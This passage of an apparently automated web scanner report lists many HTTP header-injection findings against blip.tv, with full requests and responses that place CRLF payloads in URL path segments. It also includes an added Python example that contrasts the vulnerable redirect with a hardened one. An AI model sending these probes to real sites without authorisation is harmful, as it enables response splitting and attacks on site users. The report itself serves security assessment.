/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 336
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 1498216841
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/15aac
ed07c2899be/Pudd
...[SNIP]...

2.134. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ab976%0d%0a0f16fedc6ba was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/ab976%0d%0a0f16fedc6ba HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/ab976
0f16fedc6ba

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 1274881790
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/ab976
0f16fedc6ba"
...[SNIP]...

2.135. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5ecc3%0d%0a7f0f5967c61 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5ecc3%0d%0a7f0f5967c61/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/5ecc3
7f0f5967c61
/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 335
Date: Thu, 20 Jan 2011 00:38:26 GMT
X-Varnish: 1025266593
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/5ecc3
7f0f5967c61/get/Puddi
...[SNIP]...

2.136. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 5716a%0d%0ad4e7b0c5e2d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/5716a%0d%0ad4e7b0c5e2d/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/5716a
d4e7b0c5e2d
/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 336
Date: Thu, 20 Jan 2011 00:38:26 GMT
X-Varnish: 1025266634
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/5716a
d4e7b0c5e2d/Pudd
...[SNIP]...

2.137. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload dca82%0d%0a1e10a54d81c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/dca82%0d%0a1e10a54d81c HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/dca82
1e10a54d81c

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:26 GMT
X-Varnish: 1025266669
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/dca82
1e10a54d81c"
...[SNIP]...

2.138. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 681cb%0d%0a3419a97bd3c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /681cb%0d%0a3419a97bd3c/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/681cb
3419a97bd3c
/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv
Content-Type: text/html; charset=iso-8859-1
Content-Length: 350
Date: Thu, 20 Jan 2011 00:38:25 GMT
X-Varnish: 344226661
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/681cb
3419a97bd3c/get/Puddi
...[SNIP]...

2.139. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload edb41%0d%0a09ccf4faebb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/edb41%0d%0a09ccf4faebb/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/edb41
09ccf4faebb
/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv
Content-Type: text/html; charset=iso-8859-1
Content-Length: 336
Date: Thu, 20 Jan 2011 00:38:25 GMT
X-Varnish: 2146045301
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/edb41
09ccf4faebb/Pudd
...[SNIP]...

2.140. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 34f59%0d%0ac42b6f400ed was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/34f59%0d%0ac42b6f400ed HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/34f59
c42b6f400ed

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:25 GMT
X-Varnish: 344226741
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/34f59
c42b6f400ed"
...[SNIP]...

2.141. http://blip.tv/file/get/Squatters-Episode13234.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Squatters-Episode13234.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8d029%0d%0aad712a041c1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8d029%0d%0aad712a041c1/get/Squatters-Episode13234.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/8d029
ad712a041c1
/get/Squatters-Episode13234.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 324
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 1324527425
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/8d029
ad712a041c1/get/Squat
...[SNIP]...

2.142. http://blip.tv/file/get/Squatters-Episode13234.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Squatters-Episode13234.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 199f8%0d%0a84438fc7315 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/199f8%0d%0a84438fc7315/Squatters-Episode13234.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/199f8
84438fc7315
/Squatters-Episode13234.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 310
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 1248905335
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/199f8
84438fc7315/Squa
...[SNIP]...

2.143. http://blip.tv/file/get/Squatters-Episode13234.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Squatters-Episode13234.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 28e9d%0d%0a714b07cdff8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/28e9d%0d%0a714b07cdff8 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/28e9d
714b07cdff8

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 344227195
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/28e9d
714b07cdff8"
...[SNIP]...
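
Findings 2.141 to 2.143 cover all three path segments of one URL, so the root cause is the redirect itself rather than any one segment: the server decodes the request path and copies it into the Location header of a 302 to www.blip.tv without re-encoding it. The block below is an added example, not code from the report or from the site's Apache configuration; it models that redirect in Python in its observed form and in a hardened form that re-encodes the path and refuses to emit control characters in any header. The target host is taken from the captured responses; everything else is an assumption.

```python
"""Added example (not from the scanner report): the host redirect behind these
findings, modelled in Python, in the observed form and a hardened form."""
from urllib.parse import quote, unquote, urlsplit

TARGET_HOST = "www.blip.tv"   # the host every captured Location header points at

# Field values may not contain CR, LF, NUL or other C0 controls (HTAB is the
# one control character RFC 7230 permits inside a field value).
_FORBIDDEN = {chr(c) for c in range(0x20) if c != 0x09} | {chr(0x7F)}


def vulnerable_location(raw_path: str) -> str:
    """Copy the decoded request target into Location unchanged.

    A segment of '8d029%0d%0aad712a041c1' decodes to text holding a bare CR LF,
    which is exactly what the report's responses show."""
    return f"http://{TARGET_HOST}{unquote(raw_path)}"


def safe_location(raw_path: str) -> str:
    """Decode once, then re-encode: anything outside the unreserved set and the
    path delimiters is percent-encoded again, so CR LF becomes %0D%0A. Decoding
    first keeps already-encoded input from being double-encoded."""
    parts = urlsplit(raw_path)
    path = quote(unquote(parts.path), safe="/")
    query = "?" + quote(unquote(parts.query), safe="=&") if parts.query else ""
    return f"http://{TARGET_HOST}{path}{query}"


def check_header_value(name: str, value: str) -> str:
    """Last line of defence at the point where headers are written: reject any
    value that could terminate the header, whatever produced it."""
    if any(c in _FORBIDDEN for c in value):
        raise ValueError(f"control character in {name} header value")
    return value


def redirect_headers(raw_path: str, build=safe_location) -> list:
    """Header list for the 302 seen in the report, validated before emission."""
    headers = [
        ("Location", build(raw_path)),
        ("Content-Type", "text/html; charset=iso-8859-1"),
    ]
    return [(name, check_header_value(name, value)) for name, value in headers]


if __name__ == "__main__":
    probe = "/8d029%0d%0aad712a041c1/get/Squatters-Episode13234.m4v"
    print(repr(vulnerable_location(probe)))   # bare CR LF inside the value
    print(safe_location(probe))               # CR LF stays percent-encoded
    try:
        redirect_headers(probe, build=vulnerable_location)
    except ValueError as err:
        print("rejected:", err)
```

Both measures belong together: the re-encoding fixes the redirect that the report found, and the emission check catches the next place that builds a header from request data. In Apache terms the equivalent is to redirect with the original, still-encoded request target rather than the decoded path, and to verify by re-sending the probe and confirming that the Location value now contains `%0D%0A` as literal text.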

2.144. http://blip.tv/file/get/Squatters-Episode13604.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Squatters-Episode13604.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 887de%0d%0ad8caab3d9df was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /887de%0d%0ad8caab3d9df/get/Squatters-Episode13604.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/887de
d8caab3d9df
/get/Squatters-Episode13604.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 309
Date: Thu, 20 Jan 2011 00:38:27 GMT
X-Varnish: 344227043
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/887de
d8caab3d9df/get/Squat
...[SNIP]...

2.145. http://blip.tv/file/get/Squatters-Episode13604.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Squatters-Episode13604.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9f258%0d%0a598cdcfe38c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/9f258%0d%0a598cdcfe38c/Squatters-Episode13604.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/9f258
598cdcfe38c
/Squatters-Episode13604.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 310
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 1324527433
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/9f258
598cdcfe38c/Squa
...[SNIP]...

2.146. http://blip.tv/file/get/Squatters-Episode13604.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Squatters-Episode13604.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 374f6%0d%0a4993a0b8373 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/374f6%0d%0a4993a0b8373 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/374f6
4993a0b8373

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 1248905355
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/374f6
4993a0b8373"
...[SNIP]...

2.147. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e3ad0%0d%0ac27f2f30a37 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e3ad0%0d%0ac27f2f30a37/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/e3ad0
c27f2f30a37
/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 359
Date: Thu, 20 Jan 2011 00:38:26 GMT
X-Varnish: 1025266617
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/e3ad0
c27f2f30a37/get/Stupi
...[SNIP]...

2.148. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d727c%0d%0a131771b9b3c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/d727c%0d%0a131771b9b3c/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/d727c
131771b9b3c
/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 360
Date: Thu, 20 Jan 2011 00:38:26 GMT
X-Varnish: 1248905096
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/d727c
131771b9b3c/Stup
...[SNIP]...

2.149. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 72f06%0d%0ab6c0ac15760 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/72f06%0d%0ab6c0ac15760 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/72f06
b6c0ac15760

Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:27 GMT
X-Varnish: 1274881608
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/72f06
b6c0ac15760"
...[SNIP]...

2.150. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6a8c4%0d%0a179c2a49497 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6a8c4%0d%0a179c2a49497/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/6a8c4
179c2a49497
/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 359
Date: Thu, 20 Jan 2011 00:38:26 GMT
X-Varnish: 1025266631
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/6a8c4
179c2a49497/get/Stupi
...[SNIP]...

2.151. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c374d%0d%0add42cac7674 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/c374d%0d%0add42cac7674/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
